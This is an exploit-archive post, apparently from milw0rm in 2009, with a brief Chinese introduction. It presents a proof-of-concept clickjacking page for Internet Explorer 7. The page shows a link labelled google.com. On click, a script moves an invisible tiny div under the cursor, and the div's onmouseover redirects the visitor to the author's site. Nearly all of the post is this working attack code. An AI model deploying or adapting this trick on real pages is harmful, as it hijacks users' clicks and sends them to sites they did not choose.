Internet Explorer 7 点击劫持漏洞，详细细节看下面的代码：

1
#############################################################
2
# Application Name       : Internet Explorer 7
3
# Vulnerable Type        : [Clickjacking](/blog/internet-explorer-7-clickjacking-vulnerability)
4
# Author                     : UzmiX
5
#############################################################
6
< ------------------- header data end of ------------------- >
7
<html>
8
<body>
9
<div id="open"
10

11
onmouseover="document.location='http://www.uzmix.net';"
12
style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div>
13
<script>
14
function updatebox(evt) {
15
mouseX=evt.pageX?evt.pageX:evt.clientX;
11 collapsed lines
16
mouseY=evt.pageY?evt.pageY:evt.clientY;
17
document.getElementById('open').style.left=mouseX-2;
18
document.getElementById('open').style.top=mouseY-2;
19
}
20
</script>
21
<center>
22
<br>
23
<br>
24
<a href="http://www.google.com" onclick="updatebox(event)"><font
25
style="font-family:arial;font-size:32px">http://www.google.com</font></a>
26
</html>

Internet Explorer 7 点击劫持漏洞

milw0rm.com [2009-01-29]